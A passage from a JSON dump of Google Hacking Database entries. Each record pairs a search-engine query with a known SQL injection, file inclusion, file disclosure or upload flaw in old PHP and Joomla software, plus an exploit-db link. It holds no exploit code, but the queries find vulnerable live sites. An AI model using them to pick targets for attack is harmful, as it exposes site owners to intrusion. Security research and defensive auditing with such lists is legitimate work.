http://www.exploit-db.com/exploits/1723" }, { "signatureReferenceNumber": "1573", "link": "https://www.exploit-db.com/ghdb/1573/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_portfolio", "shortDescription": "inurl:index.php?option=com_portfolio", "textualDescription": "Joomla Component com_portfolio Local File Disclosure: http://www.exploit-db.com/exploits/12325" }, { "signatureReferenceNumber": "1574", "link": "https://www.exploit-db.com/ghdb/1574/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:%22/ubbthreads/%22", "shortDescription": "allinurl:\"/ubbthreads/\"", "textualDescription": "UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability - CVE: 2006-2568: http://www.exploit-db.com/exploits/1814" }, { "signatureReferenceNumber": "1575", "link": "https://www.exploit-db.com/ghdb/1575/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+zomplog%22", "shortDescription": "\"powered by zomplog\"", "textualDescription": "Zomplog 3.8.2 (force_download.php) File Disclosure Vulnerability: http://www.exploit-db.com/exploits/5636" }, { "signatureReferenceNumber": "1576", "link": "https://www.exploit-db.com/ghdb/1576/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22/cgi-bin/ourspace/%22", "shortDescription": "inurl:\"/cgi-bin/ourspace/\"", "textualDescription": "Ourspace 2.0.9 (uploadmedia.cgi) Remote File Upload Vulnerability - CVE: 2007-4647: http://www.exploit-db.com/exploits/4343" }, { "signatureReferenceNumber": "1577", "link": "https://www.exploit-db.com/ghdb/1577/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_joomradio", "shortDescription": "inurl:index.php?option=com_joomradio", "textualDescription": "Joomla Component com_joomradio SQL injection vulnerability - CVE: 2008-2633: http://www.exploit-db.com/exploits/12400" }, { "signatureReferenceNumber": "1578", "link": "https://www.exploit-db.com/ghdb/1578/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+xeCMS%22", "shortDescription": "\"Powered by xeCMS\"", "textualDescription": "xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability - CVE: 2007-6508: http://www.exploit-db.com/exploits/4758" }, { "signatureReferenceNumber": "1579", "link": "https://www.exploit-db.com/ghdb/1579/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Power+by+PHP+Classifieds", "shortDescription": "Power by PHP Classifieds", "textualDescription": "Pre PHP Classifieds SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13992" }, { "signatureReferenceNumber": "1580", "link": "https://www.exploit-db.com/ghdb/1580/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+clipshare%22", "shortDescription": "\"powered by clipshare\"", "textualDescription": "ClipShare 3.0.1 (tid) Remote SQL Injection Vulnerability - CVE: 2008-2793: http://www.exploit-db.com/exploits/5839" }, { "signatureReferenceNumber": "1581", "link": "https://www.exploit-db.com/ghdb/1581/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_dailymeals%22", "shortDescription": "inurl:\"com_dailymeals\"", "textualDescription": "Joomla Component com_dailymeals LFI Vulnerability: http://www.exploit-db.com/exploits/10928" }, { "signatureReferenceNumber": "1582", "link": "https://www.exploit-db.com/ghdb/1582/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22/k12.tr/%3Fpart%3D%22", "shortDescription": "inurl:\"/k12.tr/?part=\"", "textualDescription": "Okul Otomasyon Portal 2.0 Remote SQL Injection Vulnerability - CVE: 2007-5490: http://www.exploit-db.com/exploits/4539" }, { "signatureReferenceNumber": "1583", "link": "https://www.exploit-db.com/ghdb/1583/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22toplist.php%22+%22powered+by+phpbb%22", "shortDescription": "inurl:\"toplist.php\" \"powered by phpbb\"", "textualDescription": "TopList" }, { "signatureReferenceNumber": "1584", "link": "https://www.exploit-db.com/ghdb/1584/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_clan%22", "shortDescription": "inurl:\"com_clan\"", "textualDescription": "Joomla Component (com_clan) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15454" }, { "signatureReferenceNumber": "1585", "link": "https://www.exploit-db.com/ghdb/1585/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+WSN+Guest%22", "shortDescription": "\"Powered by WSN Guest\"", "textualDescription": "WSN Guest Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/11344" }, { "signatureReferenceNumber": "1586", "link": "https://www.exploit-db.com/ghdb/1586/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+com_paxxgallery+%22userid%22", "shortDescription": "allinurl: com_paxxgallery \"userid\"", "textualDescription": "Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability - CVE: 2008-0801: http://www.exploit-db.com/exploits/5117" }, { "signatureReferenceNumber": "1588", "link": "https://www.exploit-db.com/ghdb/1588/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index2.php%3Foption%3Drss%22+OR+%22powered+By+Limbo+CMS%22", "shortDescription": "inurl:\"index2.php?option=rss\" OR \"powered By Limbo CMS\"", "textualDescription": "Limbo CMS 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability - CVE: 2006-2142: http://www.exploit-db.com/exploits/1729" }, { "signatureReferenceNumber": "1589", "link": "https://www.exploit-db.com/ghdb/1589/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+ezContents+Version+1.4.5%22", "shortDescription": "\"Powered by ezContents Version 1.4.5\"", "textualDescription": "ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability - CVE: 2007-6368: http://www.exploit-db.com/exploits/4694" }, { "signatureReferenceNumber": "1590", "link": "https://www.exploit-db.com/ghdb/1590/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=powered+by+CMSbright+%C3%82%C2%A9+websens", "shortDescription": "powered by CMSbright \u00c2\u00a9 websens", "textualDescription": "CMSbright (id_rub_page) Remote SQL Injection Vulnerability - CVE: 2008-6991: http://www.exploit-db.com/exploits/6343" }, { "signatureReferenceNumber": "1591", "link": "https://www.exploit-db.com/ghdb/1591/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+com_quiz%22tid%22", "shortDescription": "allinurl: com_quiz\"tid\"", "textualDescription": "Joomla Component Quiz 0.81 (tid) SQL Injection Vulnerability - CVE: 2008-0799: http://www.exploit-db.com/exploits/5119" }, { "signatureReferenceNumber": "1592", "link": "https://www.exploit-db.com/ghdb/1592/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_biographies%22", "shortDescription": "inurl:\"com_biographies\"", "textualDescription": "Joomla Component com_biographies SQL injection Vulnerability: http://www.exploit-db.com/exploits/11226" }, { "signatureReferenceNumber": "1593", "link": "https://www.exploit-db.com/ghdb/1593/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%22com_gurujibook%22", "shortDescription": "inurl\"com_gurujibook\"", "textualDescription": "Joomla Component com_gurujibook SQL injection Vulnerability: http://www.exploit-db.com/exploits/11225" }, { "signatureReferenceNumber": "1594", "link": "https://www.exploit-db.com/ghdb/1594/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/system/article/alltopics.php+OR+inurl:/system/user/index.php", "shortDescription": "inurl:/system/article/alltopics.php OR inurl:/system/user/index.php", "textualDescription": "OpenPHPNuke 2.3.3 Remote File Inclusion Vulnerability - CVE: 2006-2137: http://www.exploit-db.com/exploits/1727" }, { "signatureReferenceNumber": "1595", "link": "https://www.exploit-db.com/ghdb/1595/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Realizzato+con+WSC+CMS++by+Dynamicsoft", "shortDescription": "Realizzato con WSC CMS by Dynamicsoft", "textualDescription": "WSC CMS (Bypass) SQL Injection Vulnerability - CVE: 2010-0698: http://www.exploit-db.com/exploits/11507" }, { "signatureReferenceNumber": "1596", "link": "https://www.exploit-db.com/ghdb/1596/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Knowledge+Base%22", "shortDescription": "\"Powered by Knowledge Base\"", "textualDescription": "Knowledge Base Mod 2.0.2 (phpBB) Remote Inclusion Vulnerability - CVE: 2006-2134: http://www.exploit-db.com/exploits/1728" }, { "signatureReferenceNumber": "1597", "link": "https://www.exploit-db.com/ghdb/1597/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:%22com_extcalendar%22", "shortDescription": "allinurl:\"com_extcalendar\"", "textualDescription": "Joomla Component com_extcalendar Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14694" }, { "signatureReferenceNumber": "1598", "link": "https://www.exploit-db.com/ghdb/1598/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22Jax+Formmailer+-+Administration%22", "shortDescription": "intitle:\"Jax Formmailer - Administration\"", "textualDescription": "Jax FormMailer 3.0.0 Remote File Inclusion Vulnerability - CVE: 2009-2378: http://www.exploit-db.com/exploits/9051" }, { "signatureReferenceNumber": "1599", "link": "https://www.exploit-db.com/ghdb/1599/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by:+Linkarity%C3%A2", "shortDescription": "Powered by: Linkarity\u00e2", "textualDescription": "Linkarity (link.php) Remote SQL Injection Vulnerability - CVE: 2008-4353: http://www.exploit-db.com/exploits/6455" }, { "signatureReferenceNumber": "1600", "link": "https://www.exploit-db.com/ghdb/1600/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_yanc", "shortDescription": "inurl:index.php?option=com_yanc", "textualDescription": "Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability - CVE: 2007-2792: http://www.exploit-db.com/exploits/3944" }, { "signatureReferenceNumber": "1602", "link": "https://www.exploit-db.com/ghdb/1602/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22index.php%3Fp%3Dgallerypic+img_id%22", "shortDescription": "allinurl: \"index.php?p=gallerypic img_id\"", "textualDescription": "Koobi Pro v6.1 gallery (img_id) - CVE: 2008-6210: http://www.exploit-db.com/exploits/10751" }, { "signatureReferenceNumber": "1603", "link": "https://www.exploit-db.com/ghdb/1603/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:classified.php+phpbazar", "shortDescription": "inurl:classified.php phpbazar", "textualDescription": "phpBazar 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities - CVE: 2006-2527: http://www.exploit-db.com/exploits/1804" }, { "signatureReferenceNumber": "1605", "link": "https://www.exploit-db.com/ghdb/1605/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered+by+Firebrand+Technologies%22", "shortDescription": "intext:\"Powered by Firebrand Technologies\"", "textualDescription": "CMS Firebrand Tec Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/12378" }, { "signatureReferenceNumber": "1606", "link": "https://www.exploit-db.com/ghdb/1606/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Designed+and+Developed+by+Debliteck+Ltd%22", "shortDescription": "\"Designed and Developed by Debliteck Ltd\"", "textualDescription": "DB[CMS] Sql Injection Vulnerability: http://www.exploit-db.com/exploits/12654" }, { "signatureReferenceNumber": "1608", "link": "https://www.exploit-db.com/ghdb/1608/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Designed+and+Developed+by+Debliteck+Ltd%22", "shortDescription": "\"Designed and Developed by Debliteck Ltd\"", "textualDescription": "DB[CMS] (section.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12659" }, { "signatureReferenceNumber": "1609", "link": "https://www.exploit-db.com/ghdb/1609/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Supernews+2.6", "shortDescription": "Supernews 2.6", "textualDescription": "Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8869" }, { "signatureReferenceNumber": "1610", "link": "https://www.exploit-db.com/ghdb/1610/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+ezUserManager%22", "shortDescription": "\"powered by ezUserManager\"", "textualDescription": "ezUserManager 1.6 Remote File Inclusion Vulnerability - CVE: 2006-2424: http://www.exploit-db.com/exploits/1795" }, { "signatureReferenceNumber": "1611", "link": "https://www.exploit-db.com/ghdb/1611/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by:+PreProjects", "shortDescription": "Powered by: PreProjects", "textualDescription": "Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13996" }, { "signatureReferenceNumber": "1612", "link": "https://www.exploit-db.com/ghdb/1612/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allintitle:+%22MCgallery+0.5b%22", "shortDescription": "allintitle: \"MCgallery 0.5b\"", "textualDescription": "McGallery 0.5b (download.php) Arbitrary File Download Vulnerability - CVE: 2007-1478: http://www.exploit-db.com/exploits/3494" }, { "signatureReferenceNumber": "1613", "link": "https://www.exploit-db.com/ghdb/1613/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=TRUC+0.11.0+::+%C3%82%C2%A9+2006+by+ASDIS+:", "shortDescription": "TRUC 0.11.0 :: \u00c2\u00a9 2006 by ASDIS :", "textualDescription": "RUC 0.11.0 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-0814: http://www.exploit-db.com/exploits/5129" }, { "signatureReferenceNumber": "1614", "link": "https://www.exploit-db.com/ghdb/1614/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=contact_frm.php", "shortDescription": "contact_frm.php", "textualDescription": "Recipes Website 1.0 SQL Injection - OSVDB-ID: 64841: http://www.exploit-db.com/exploits/12703" }, { "signatureReferenceNumber": "1615", "link": "https://www.exploit-db.com/ghdb/1615/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Natterchat+v1.12", "shortDescription": "Powered by Natterchat v1.12", "textualDescription": "Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: http://www.exploit-db.com/exploits/7175" }, { "signatureReferenceNumber": "1616", "link": "https://www.exploit-db.com/ghdb/1616/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Instant+Free+File+Uploader%22", "shortDescription": "\"Instant Free File Uploader\"", "textualDescription": "Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10241" }, { "signatureReferenceNumber": "1618", "link": "https://www.exploit-db.com/ghdb/1618/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Webiz+inurl:'wmt/webpages", "shortDescription": "Powered by Webiz inurl:'wmt/webpages'", "textualDescription": "(Webiz) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12798" }, { "signatureReferenceNumber": "1619", "link": "https://www.exploit-db.com/ghdb/1619/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+xchangeboard%22", "shortDescription": "\"Powered by xchangeboard\"", "textualDescription": "XchangeBoard 1.70 (boardID) Remote SQL Injection Vulnerability - CVE: 2008-3035: http://www.exploit-db.com/exploits/5991" }, { "signatureReferenceNumber": "1620", "link": "https://www.exploit-db.com/ghdb/1620/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+com_mcquiz+%22tid%22", "shortDescription": "allinurl: com_mcquiz \"tid\"", "textualDescription": "Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability - CVE: 2008-0800: http://www.exploit-db.com/exploits/5118" }, { "signatureReferenceNumber": "1622", "link": "https://www.exploit-db.com/ghdb/1622/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_productbook%22", "shortDescription": "inurl:\"com_productbook\"", "textualDescription": "Joomla Component com_productbook SQL Injection Vulnerability - CVE: 2010-1045: http://www.exploit-db.com/exploits/11352" }, { "signatureReferenceNumber": "1623", "link": "https://www.exploit-db.com/ghdb/1623/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:+%22com_alphacontent%22", "shortDescription": "inurl: \"com_alphacontent\"", "textualDescription": "Joomla Component alphacontent 2.5.8 (id) SQL Injection Vulnerability - CVE: 2008-1559: http://www.exploit-db.com/exploits/5310" }, { "signatureReferenceNumber": "1624", "link": "https://www.exploit-db.com/ghdb/1624/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by:+PreProjects%22", "shortDescription": "\"Powered by: PreProjects\"", "textualDescription": "Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13987" }, { "signatureReferenceNumber": "1625", "link": "https://www.exploit-db.com/ghdb/1625/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+SoftbizScripts%22+inurl:store_info.php", "shortDescription": "\"Powered by SoftbizScripts\" inurl:store_info.php", "textualDescription": "Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability - CVE: 2007-5122: http://www.exploit-db.com/exploits/4457" }, { "signatureReferenceNumber": "1626", "link": "https://www.exploit-db.com/ghdb/1626/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_avosbillets%22", "shortDescription": "inurl:\"com_avosbillets\"", "textualDescription": "Joomla (com_avosbillets) SQL injection Vulnerability: http://www.exploit-db.com/exploits/11223" }, { "signatureReferenceNumber": "1628", "link": "https://www.exploit-db.com/ghdb/1628/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+Aardvark+Topsites+PHP+4.2.2%22", "shortDescription": "\"Powered By Aardvark Topsites PHP 4.2.2\"", "textualDescription": "Aardvark Topsites PHP 4.2.2 (path) Remote File Inclusion Vuln - CVE: 2006-7026: http://www.exploit-db.com/exploits/1730" }, { "signatureReferenceNumber": "1629", "link": "https://www.exploit-db.com/ghdb/1629/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_projectfork%22", "shortDescription": "inurl:\"com_projectfork\"", "textualDescription": "Joomla Component com_Projectfork 2.0.10 Local File Inclusion Vuln - CVE: 2009-2100: http://www.exploit-db.com/exploits/8946" }, { "signatureReferenceNumber": "1630", "link": "https://www.exploit-db.com/ghdb/1630/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered+by+PHPCityPortal.com%22", "shortDescription": "intext:\"Powered by PHPCityPortal.com\"", "textualDescription": "PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2009-4870: http://www.exploit-db.com/exploits/9395" }, { "signatureReferenceNumber": "1631", "link": "https://www.exploit-db.com/ghdb/1631/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22jGallery%22", "shortDescription": "intitle:\"jGallery\"", "textualDescription": "jGallery 1.3 (index.php) Remote File Inclusion Vulnerability - CVE: 2007-2158: http://www.exploit-db.com/exploits/3760" }, { "signatureReferenceNumber": "1633", "link": "https://www.exploit-db.com/ghdb/1633/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Download+3000%22", "shortDescription": "\"Powered by Download 3000\"", "textualDescription": "Joomla Component d3000 1.0.0 Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5299" }, { "signatureReferenceNumber": "1634", "link": "https://www.exploit-db.com/ghdb/1634/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22zFeeder+admin+panel%22", "shortDescription": "intitle:\"zFeeder admin panel\"", "textualDescription": "zFeeder 1.6 (admin.php) No Authentication Vulnerability - CVE: 2009-0807: http://www.exploit-db.com/exploits/8092" }, { "signatureReferenceNumber": "1635", "link": "https://www.exploit-db.com/ghdb/1635/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+WebStudio", "shortDescription": "Powered by WebStudio", "textualDescription": "WebStudio CMS (pageid) Remote Blind SQL Injection Vuln - CVE: 2008-5336: http://www.exploit-db.com/exploits/7236" }, { "signatureReferenceNumber": "1636", "link": "https://www.exploit-db.com/ghdb/1636/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22select_file2.php%22", "shortDescription": "inurl:\"select_file2.php\"", "textualDescription": "Flashden Multiple File Uploader Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10236" }, { "signatureReferenceNumber": "1638", "link": "https://www.exploit-db.com/ghdb/1638/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+Gradman%22", "shortDescription": "\"powered by Gradman\"", "textualDescription": "Gradman 0.1.3 (info.php tabla) Local File Inclusion Vulnerability - CVE: 2008-0393: http://www.exploit-db.com/exploits/4936" }, { "signatureReferenceNumber": "1639", "link": "https://www.exploit-db.com/ghdb/1639/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Designed+and+Developed+by+Debliteck+Ltd%22", "shortDescription": "\"Designed and Developed by Debliteck Ltd\"", "textualDescription": "DB[CMS] (article.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12666" }, { "signatureReferenceNumber": "1640", "link": "https://www.exploit-db.com/ghdb/1640/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+mlffat%22", "shortDescription": "\"Powered by mlffat\"", "textualDescription": "Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8674" }, { "signatureReferenceNumber": "1641", "link": "https://www.exploit-db.com/ghdb/1641/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22/squirrelcart/%22+-squirrelcart.com", "shortDescription": "inurl:\"/squirrelcart/\" -squirrelcart.com", "textualDescription": "Squirrelcart 1.x.x (cart.php) Remote File Inclusion Vulnerability - CVE: 2007-4439: http://www.exploit-db.com/exploits/4295" }, { "signatureReferenceNumber": "1642", "link": "https://www.exploit-db.com/ghdb/1642/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Engine+powered+by+easyLink+V1.1.0.", "shortDescription": "Engine powered by easyLink V1.1.0.", "textualDescription": "easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability - CVE: 2008-6471: http://www.exploit-db.com/exploits/6494" }, { "signatureReferenceNumber": "1643", "link": "https://www.exploit-db.com/ghdb/1643/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allintext:+%22This+site+is+powered+by+IndexScript%22", "shortDescription": "allintext: \"This site is powered by IndexScript\"", "textualDescription": "IndexScript 2.8 (show_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-4069: http://www.exploit-db.com/exploits/4225" }, { "signatureReferenceNumber": "1644", "link": "https://www.exploit-db.com/ghdb/1644/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%C3%82%C2%A92005+Ocean12+Technologies.+All+rights+reserved", "shortDescription": "\u00c2\u00a92005 Ocean12 Technologies. All rights reserved", "textualDescription": "Ocean12 Membership Manager Pro Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7245" }, { "signatureReferenceNumber": "1646", "link": "https://www.exploit-db.com/ghdb/1646/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+PassWiki%22", "shortDescription": "\"powered by PassWiki\"", "textualDescription": "PassWiki 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability - CVE: 2008-6423: http://www.exploit-db.com/exploits/5704" }, { "signatureReferenceNumber": "1647", "link": "https://www.exploit-db.com/ghdb/1647/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22software+2004-2005+by+randshop%22", "shortDescription": "\"software 2004-2005 by randshop\"", "textualDescription": "Randshop 1.1.1 (header.inc.php) Remote File Include Vulnerability - CVE: 2006-3375: http://www.exploit-db.com/exploits/1971" }, { "signatureReferenceNumber": "1648", "link": "https://www.exploit-db.com/ghdb/1648/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+phpEmployment%22", "shortDescription": "\"powered by phpEmployment\"", "textualDescription": "phpEmployment (php upload) Arbitrary File Upload Vulnerability - CVE: 2008-6920: http://www.exploit-db.com/exploits/7563" }, { "signatureReferenceNumber": "1649", "link": "https://www.exploit-db.com/ghdb/1649/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22wp-download.php%3Fdl_id%3D%22", "shortDescription": "inurl:\"wp-download.php?dl_id=\"", "textualDescription": "Wordpress Plugin Download (dl_id) SQL Injection Vulnerability - CVE: 2008-1646: http://www.exploit-db.com/exploits/5326" }, { "signatureReferenceNumber": "1651", "link": "https://www.exploit-db.com/ghdb/1651/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22%C2%A9+2004+PHPKick.de+Version+0.8%22", "shortDescription": "\"\u00a9 2004 PHPKick.de Version 0.8\"", "textualDescription": "PHPKick v0.8 statistics.php SQL Injection - CVE: 2010-3029: http://www.exploit-db.com/exploits/14578" }, { "signatureReferenceNumber": "1652", "link": "https://www.exploit-db.com/ghdb/1652/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+VS+PANEL%22", "shortDescription": "\"Powered by VS PANEL\"", "textualDescription": "VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection Vulnerability - CVE: 2009-3590: http://www.exploit-db.com/exploits/8506" }, { "signatureReferenceNumber": "1653", "link": "https://www.exploit-db.com/ghdb/1653/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+phpmydirectory%22+OR+intext:%222001-2006+phpMyDirectory.com%22", "shortDescription": "\"powered by phpmydirectory\" OR intext:\"2001-2006 phpMyDirectory.com\"", "textualDescription": "phpMyDirectory 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability - CVE: 2006-2521: http://www.exploit-db.com/exploits/1808" }, { "signatureReferenceNumber": "1654", "link": "https://www.exploit-db.com/ghdb/1654/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Kalimat+news+system+v+1.0%22", "shortDescription": "intext:\"Kalimat news system v 1.0\"", "textualDescription": "kalimat new system v 1.0 (index.php) SQL Injection: http://www.exploit-db.com/exploits/11563" }, { "signatureReferenceNumber": "1655", "link": "https://www.exploit-db.com/ghdb/1655/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by:+PhotoPost+PHP+4.6", "shortDescription": "Powered by: PhotoPost PHP 4.6", "textualDescription": "PhotoPost PHP SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14446" }, { "signatureReferenceNumber": "1656", "link": "https://www.exploit-db.com/ghdb/1656/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Maian+Recipe+v1.0%22", "shortDescription": "\"Powered by Maian Recipe v1.0\"", "textualDescription": "Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability - CVE: 2007-0848: http://www.exploit-db.com/exploits/3284" }, { "signatureReferenceNumber": "1657", "link": "https://www.exploit-db.com/ghdb/1657/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+CommonSense+CMS%22", "shortDescription": "\"Powered by CommonSense CMS\"", "textualDescription": "CommonSense CMS Sql Injection Vulnerability: http://www.exploit-db.com/exploits/13762" }, { "signatureReferenceNumber": "1658", "link": "https://www.exploit-db.com/ghdb/1658/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Eyeland+Studio+Inc.+All+Rights+Reserved.%22+inurl:game.php", "shortDescription": "\"Eyeland Studio Inc. All Rights Reserved.\" inurl:game.php", "textualDescription": "Eyeland Studio Inc. (game.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13858" }, { "signatureReferenceNumber": "1659", "link": "https://www.exploit-db.com/ghdb/1659/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+Pagetool%22", "shortDescription": "\"powered by Pagetool\"", "textualDescription": "Pagetool 1.07 (news_id) Remote SQL Injection Vulnerability - CVE: 2007-3402: http://www.exploit-db.com/exploits/4107" }, { "signatureReferenceNumber": "1660", "link": "https://www.exploit-db.com/ghdb/1660/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=powered+by+jshop", "shortDescription": "powered by jshop", "textualDescription": "Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability - CVE: 2007-0232: http://www.exploit-db.com/exploits/3113" }, { "signatureReferenceNumber": "1661", "link": "https://www.exploit-db.com/ghdb/1661/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=/modules/mx_links/", "shortDescription": "/modules/mx_links/", "textualDescription": "mxBB Module WebLinks 2.05 Remote Inclusion Vulnerability - CVE: 2006-6645: http://www.exploit-db.com/exploits/2939" }, { "signatureReferenceNumber": "1662", "link": "https://www.exploit-db.com/ghdb/1662/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22%3FpageNum_RSnews%22%26view", 